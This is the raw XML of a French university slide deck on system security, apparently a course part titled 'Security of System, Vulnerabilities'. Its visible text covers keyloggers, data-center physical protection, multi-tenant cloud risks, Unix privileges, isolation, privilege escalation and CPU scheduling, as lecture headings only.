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7" r:id="rId3"/>
    <p:sldId id="316" r:id="rId4"/>
    <p:sldId id="335" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="338" r:id="rId7"/>
    <p:sldId id="374" r:id="rId8"/>
    <p:sldId id="373" r:id="rId9"/>
    <p:sldId id="376" r:id="rId10"/>
    <p:sldId id="375" r:id="rId11"/>
    <p:sldId id="379" r:id="rId12"/>
    <p:sldId id="380" r:id="rId13"/>
    <p:sldId id="381" r:id="rId14"/>
    <p:sldId id="382" r:id="rId15"/>
    <p:sldId id="383" r:id="rId16"/>
    <p:sldId id="384" r:id="rId17"/>
    <p:sldId id="401" r:id="rId18"/>
    <p:sldId id="385" r:id="rId19"/>
    <p:sldId id="386" r:id="rId20"/>
    <p:sldId id="387" r:id="rId21"/>
    <p:sldId id="388" r:id="rId22"/>
    <p:sldId id="402" r:id="rId23"/>
    <p:sldId id="389" r:id="rId24"/>
    <p:sldId id="390" r:id="rId25"/>
    <p:sldId id="391" r:id="rId26"/>
    <p:sldId id="403" r:id="rId27"/>
    <p:sldId id="392" r:id="rId28"/>
    <p:sldId id="393" r:id="rId29"/>
    <p:sldId id="395" r:id="rId30"/>
    <p:sldId id="394" r:id="rId31"/>
    <p:sldId id="404" r:id="rId32"/>
    <p:sldId id="405" r:id="rId33"/>
    <p:sldId id="406" r:id="rId34"/>
    <p:sldId id="407" r:id="rId35"/>
    <p:sldId id="436" r:id="rId36"/>
    <p:sldId id="437" r:id="rId37"/>
    <p:sldId id="438" r:id="rId38"/>
    <p:sldId id="408" r:id="rId39"/>
    <p:sldId id="410" r:id="rId40"/>
    <p:sldId id="409" r:id="rId41"/>
    <p:sldId id="413" r:id="rId42"/>
    <p:sldId id="414" r:id="rId43"/>
    <p:sldId id="415" r:id="rId44"/>
    <p:sldId id="416" r:id="rId45"/>
    <p:sldId id="417" r:id="rId46"/>
    <p:sldId id="411" r:id="rId47"/>
    <p:sldId id="412" r:id="rId48"/>
    <p:sldId id="418" r:id="rId49"/>
    <p:sldId id="420" r:id="rId50"/>
    <p:sldId id="419" r:id="rId51"/>
    <p:sldId id="422" r:id="rId52"/>
    <p:sldId id="423" r:id="rId53"/>
    <p:sldId id="421" r:id="rId54"/>
    <p:sldId id="424" r:id="rId55"/>
    <p:sldId id="425" r:id="rId56"/>
    <p:sldId id="426" r:id="rId57"/>
    <p:sldId id="428" r:id="rId58"/>
    <p:sldId id="427" r:id="rId59"/>
    <p:sldId id="439" r:id="rId60"/>
    <p:sldId id="440" r:id="rId61"/>
    <p:sldId id="444" r:id="rId62"/>
    <p:sldId id="443" r:id="rId63"/>
    <p:sldId id="442" r:id="rId64"/>
    <p:sldId id="441" r:id="rId65"/>
    <p:sldId id="445" r:id="rId66"/>
    <p:sldId id="429" r:id="rId67"/>
    <p:sldId id="396" r:id="rId68"/>
    <p:sldId id="339" r:id="rId69"/>
    <p:sldId id="341" r:id="rId70"/>
    <p:sldId id="342" r:id="rId71"/>
    <p:sldId id="337" r:id="rId72"/>
    <p:sldId id="340" r:id="rId73"/>
    <p:sldId id="397" r:id="rId74"/>
    <p:sldId id="430" r:id="rId75"/>
    <p:sldId id="398" r:id="rId76"/>
    <p:sldId id="432" r:id="rId77"/>
    <p:sldId id="431" r:id="rId78"/>
    <p:sldId id="399" r:id="rId79"/>
    <p:sldId id="400" r:id="rId80"/>
    <p:sldId id="377" r:id="rId81"/>
    <p:sldId id="282" r:id="rId82"/>
    <p:sldId id="321" r:id="rId83"/>
    <p:sldId id="318" r:id="rId84"/>
    <p:sldId id="336" r:id="rId85"/>
    <p:sldId id="320" r:id="rId86"/>
    <p:sldId id="319" r:id="rId87"/>
    <p:sldId id="283" r:id="rId88"/>
    <p:sldId id="304" r:id="rId89"/>
    <p:sldId id="305" r:id="rId90"/>
    <p:sldId id="306" r:id="rId91"/>
    <p:sldId id="307" r:id="rId92"/>
    <p:sldId id="311" r:id="rId93"/>
    <p:sldId id="308" r:id="rId94"/>
    <p:sldId id="327" r:id="rId95"/>
    <p:sldId id="329" r:id="rId96"/>
    <p:sldId id="330" r:id="rId97"/>
    <p:sldId id="331" r:id="rId98"/>
    <p:sldId id="332" r:id="rId99"/>
    <p:sldId id="328" r:id="rId100"/>
    <p:sldId id="333" r:id="rId101"/>
    <p:sldId id="334" r:id="rId102"/>
    <p:sldId id="309" r:id="rId103"/>
    <p:sldId id="325" r:id="rId104"/>
    <p:sldId id="326" r:id="rId105"/>
    <p:sldId id="284" r:id="rId106"/>
    <p:sldId id="324" r:id="rId107"/>
    <p:sldId id="302" r:id="rId108"/>
    <p:sldId id="285" r:id="rId109"/>
    <p:sldId id="286" r:id="rId110"/>
    <p:sldId id="358" r:id="rId111"/>
    <p:sldId id="347" r:id="rId112"/>
    <p:sldId id="298" r:id="rId113"/>
    <p:sldId id="348" r:id="rId114"/>
    <p:sldId id="300" r:id="rId115"/>
    <p:sldId id="301" r:id="rId116"/>
    <p:sldId id="359" r:id="rId117"/>
    <p:sldId id="360" r:id="rId118"/>
    <p:sldId id="366" r:id="rId119"/>
    <p:sldId id="361" r:id="rId120"/>
    <p:sldId id="362" r:id="rId121"/>
    <p:sldId id="303" r:id="rId122"/>
    <p:sldId id="288" r:id="rId123"/>
    <p:sldId id="296" r:id="rId124"/>
    <p:sldId id="297" r:id="rId125"/>
    <p:sldId id="343" r:id="rId126"/>
    <p:sldId id="289" r:id="rId127"/>
    <p:sldId id="290" r:id="rId128"/>
    <p:sldId id="295" r:id="rId129"/>
    <p:sldId id="294" r:id="rId130"/>
    <p:sldId id="291" r:id="rId131"/>
    <p:sldId id="292" r:id="rId132"/>
    <p:sldId id="287" r:id="rId133"/>
    <p:sldId id="275" r:id="rId134"/>
    <p:sldId id="433" r:id="rId135"/>
    <p:sldId id="434" r:id="rId136"/>
    <p:sldId id="344" r:id="rId137"/>
    <p:sldId id="346" r:id="rId138"/>
    <p:sldId id="345" r:id="rId139"/>
    <p:sldId id="349" r:id="rId140"/>
    <p:sldId id="371" r:id="rId141"/>
    <p:sldId id="372" r:id="rId142"/>
    <p:sldId id="364" r:id="rId143"/>
    <p:sldId id="350" r:id="rId144"/>
    <p:sldId id="299" r:id="rId145"/>
    <p:sldId id="351" r:id="rId146"/>
    <p:sldId id="352" r:id="rId147"/>
    <p:sldId id="354" r:id="rId148"/>
    <p:sldId id="353" r:id="rId149"/>
    <p:sldId id="355" r:id="rId150"/>
    <p:sldId id="356" r:id="rId151"/>
    <p:sldId id="357" r:id="rId152"/>
    <p:sldId id="363" r:id="rId153"/>
    <p:sldId id="365" r:id="rId154"/>
    <p:sldId id="368" r:id="rId155"/>
    <p:sldId id="369" r:id="rId156"/>
    <p:sldId id="367" r:id="rId157"/>
    <p:sldId id="272" r:id="rId15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2946-0D6A-2C4D-020D-3AF8AE673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50A78-BABD-DE7B-7277-02B01218F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6BC10-8B81-3CA2-0BB3-4052E1F3B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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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7C17C-0EE5-05B6-EB09-7995245A9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8DEA7-69FD-A991-05B9-D877EAB5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873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ED9F-B3BE-5CC3-B61A-747CD1A19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47850-BEB2-6DDB-4F90-B6E1DD14F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26706-BD4C-78B3-75B3-42BFE7F9D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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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FF45B-583D-E279-5D1D-B7C934799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E518C-1AD8-0A42-4264-3CB2A26C7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9171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C184D7-1E53-CAF5-989B-02B81F8169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E85B0-D662-A125-8411-0DAA361BF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D454B-E460-DCB2-B28D-1DF68A7A5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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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6E85D-DBE4-C149-B9C4-AC306C65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BC3E7-DFF6-0251-5FBA-1FC0E2AA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7971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EF382-912F-7008-04D6-D24DF47B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42C20-4A5D-C083-FF8E-A439BAE45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51DE1-F73F-3373-95D5-6C52BB4FA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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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722A2-0663-79C5-F02B-F48908A3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EF8CD-E7AC-6B09-628B-01BEC177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6653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A53EC-4184-1CD9-33EA-0E7305A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41A5D-3AC8-2F4B-A4F9-65248AF1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90627-63D2-3329-EB6F-AC74D023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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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65AED-E4CB-DF19-304C-E2D5B426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2C2B3-794A-0063-5D58-E261F162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88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DB842-7D09-7C46-40F3-9B522991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7AD41-D8CB-7661-01E3-2A80EF3064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E64F2-537A-EBE9-02E8-BA24B4D3F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AB391-9A10-04FA-2F6D-7B49282F3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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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C2F88-76A5-F239-9092-ADADB573F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0473F-0C21-1B0B-F0CA-3D270725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420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B6DC-339F-47EA-360C-1F3710EE3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70E5D-90AA-8604-B6E0-2336559B8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40CD7-D7A5-D63D-1801-BC4662546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94F05-2CC0-0B18-8715-D5859E036D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74C3EC-6A41-B333-3E7C-285A9E104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EA521-48CD-2E76-DDE9-EE2750CB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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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C95033-C9DE-2E46-47AB-BE14E7ED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37CC09-8A33-56A5-64C4-88848E799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1250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C745B-51B2-8D50-3761-0083A2A7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39B8DC-843C-0C4D-76D5-647A19E64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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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92BE3-7853-A65B-DEBA-BBA9C6EDE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141DE-0330-B95F-18C1-5EFD3CEF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865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78CC7-D93A-5A81-F51A-6BC33C49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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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B3AB1-228B-1A8B-3C4C-385D6A912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227DD-EB70-9211-87AD-D3CB7F7F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97BD-792F-AB50-CDB5-E818E59D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97AD7-C8B7-80DE-F941-718F13F49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F6055-EA67-3C7C-F63E-6637865F0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36C50-848A-AD04-35E5-53F3EDFD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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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00AFF-C985-52A1-BED7-316B1775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E496B-9393-8589-5621-4FF7E4962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268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8102-BDF7-E9AB-765C-B921FD6A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7DED2-C3D5-C1B1-300A-86E5550AD5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7C4D0-E3F5-F63E-5B8F-E76E89DCB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91710-237A-CAF0-036C-DA38D7FF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74C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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2199C-F45D-7634-9665-8B8DB8AD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F1EA0-00A9-D018-5161-7C8406DE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03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CAD4B4-B5FF-8AAE-07BE-4C18211B2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7836C-EC8C-4799-BAC4-4D1C5151B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3D4B7-675C-85A8-4CFA-8D7074638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0174C-661C-48E8-B0CE-C9404F2E8C1E}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>09/03/2024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647B8-9C73-BD76-6F46-D4C0EFB81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2BE4E-8678-F8B0-D851-77978879A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0EF64-DB3D-4623-AA30-8F828E9460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83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e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E6298-7965-1E39-7F78-1CCB5611A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613" y="928688"/>
            <a:ext cx="9144000" cy="3867150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>Theory and Practice of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>Security &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> Part 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Security of System, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerabilities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3AF795-68BC-105A-841B-F853B2946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1625" y="5611576"/>
            <a:ext cx="9144000" cy="613012"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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174956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3E50-7B44-6250-D53A-9870EEC0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47764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerabilities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EA901-E504-183F-E695-0D54864C3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1" y="962795"/>
            <a:ext cx="5958113" cy="4792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DB7F4A-CCC6-4A2D-6D6C-25E2DCEF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719" y="2905125"/>
            <a:ext cx="6058120" cy="377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040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0CB3-362F-8BF2-B77E-A495E671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KeyLogger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B9E4B-A996-5C9F-0472-C09B0660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19" y="2457450"/>
            <a:ext cx="11124588" cy="249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51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FF7E-FB4B-5398-2ECB-93BED99D2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096749" cy="1028700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/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paranoiac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>KeyLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> are not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Software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045DE-3662-48C1-957D-101B2ECF1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945" y="1200868"/>
            <a:ext cx="2770110" cy="5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346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930F-3731-1234-84A8-F4209615D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85863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Physical Protections of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>DataCenters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B32E9-AA2B-5463-128F-9454B311C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41" y="1123702"/>
            <a:ext cx="5696444" cy="5696444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2" descr="Buy No Phone Allowed Warning Sticker for Bumper Car Laptop Book Suitcase  Fridge Motorcycle Helmet Door Online in India - Etsy">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26600D75-9BA7-CD7E-4E59-2F735C6EC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33" y="5362575"/>
            <a:ext cx="1451093" cy="145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Small Business Security Tip #2: You can disable data transfer on your  business computers' USB ports. This may save you fro… | Usb, Security tips,  Business computers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8871F113-752F-E5C1-44F8-E0A1AB13E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481" y="5437673"/>
            <a:ext cx="1366381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Data Centre Physical Security Fencing and Gates | CLD Systems News">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88174041-C300-680A-D2BE-3A1D587D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750" y="1253640"/>
            <a:ext cx="2655888" cy="173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87E81-7939-0B30-B50B-9EB818AD5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5676" y="1185863"/>
            <a:ext cx="2414098" cy="2050773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17416" name="Picture 8" descr="A Practical Guide to Access Control Equipment in Leisure Facilities -  Automatic Systems - International">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7DBCA3C-7534-4AF5-DEA4-64186E743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698" y="3236636"/>
            <a:ext cx="2129814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E2A69-61F7-E16F-EEB7-B4DF7982E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0999" y="3236636"/>
            <a:ext cx="185166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830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824B-53C5-0959-6A87-D67A62F0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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Securing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Systems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>But Sharing  CPU-Memory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BCC5C-1BF2-9AE0-66DA-71956789D962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3167062" y="2376488"/>
            <a:ext cx="241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Public Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hypervisor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B090B-36D9-84D8-B0DD-C4665BF6F4C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538537" y="2828926"/>
            <a:ext cx="312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Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>several</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> VMS (multi-tenant)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D8E10B-4D05-4142-76BE-AFD2DC6A878E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171949" y="3367088"/>
            <a:ext cx="252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Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>several</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Applications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6509C4B-23DB-3B93-E969-B9DB180C7E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18998531">
            <a:off x="3225179" y="2732384"/>
            <a:ext cx="291690" cy="28525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11B362B-ABE3-803A-4C6C-D996285F74B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18998531">
            <a:off x="3822142" y="3272681"/>
            <a:ext cx="291690" cy="28525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4E4841-6319-F7F6-4E59-DA0F47C23AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5424486" y="4492108"/>
            <a:ext cx="5390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Applications are complexes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   (https,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embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks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Databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)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35E0124-9F58-C524-CB50-BC2F8C3297E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18998531">
            <a:off x="5074679" y="4397701"/>
            <a:ext cx="291690" cy="28525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44BE67A-67A3-762D-F28A-81C25FD66404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18998531">
            <a:off x="5904113" y="5228401"/>
            <a:ext cx="291690" cy="28525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C77448-83CD-B21B-39F6-C1B084929CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6145208" y="5390193"/>
            <a:ext cx="284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HUGE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>History</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> of Past </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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C89DC98-D6E2-46FD-8E4A-61CC766193DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18998531">
            <a:off x="6685163" y="5884671"/>
            <a:ext cx="291690" cy="28525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1BA73C-FCC4-0EFD-BF85-11396624BC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6926258" y="6046463"/>
            <a:ext cx="520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Trust  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ?  but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>choose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>share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!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192693EB-147B-0AAD-D092-4EBDDBD14917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18998531">
            <a:off x="4432658" y="3797624"/>
            <a:ext cx="291690" cy="28525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0DEB9-594C-3E47-D6F5-4C250E29E543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782465" y="3923732"/>
            <a:ext cx="3949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Concurrently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by Millions of clients</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34838099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DCA2-3503-8CAA-5852-4678A345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Securing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Servers ... back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fundamentals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B57D7-9D68-5566-3D58-24BFA3689A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548063" y="2166937"/>
            <a:ext cx="678916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 User Mode vs   Kernel Mode ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p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 normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  and root (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>=0) ?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means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "chmod",  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sticky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bit",  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>isolation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>principles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 err="1"/>
              <a:t>Virtualizations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ? Containers ?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chroot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priviledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>escalation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"rootkit" ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-F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4379464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7358A-0476-A4E3-CF7F-C751AB0B2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365125"/>
            <a:ext cx="11920537" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cores</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (Process - Threads)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Intel Core I7 Cpu - Intel Core I3-4330 - 3 Ghz PNG Image ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5232F0D2-C23B-C980-F471-B7398961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6" y="3157537"/>
            <a:ext cx="1281112" cy="120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634CCA3-0897-8854-5549-16E092EEF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484063"/>
            <a:ext cx="417986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88C959-E499-45D6-1F45-C08D7B518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243" y="2139165"/>
            <a:ext cx="5970787" cy="34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806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F32D5-00B0-1A00-8A65-31F0F8C86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7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Preemptive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / Round-Robin </a:t>
            </a:r>
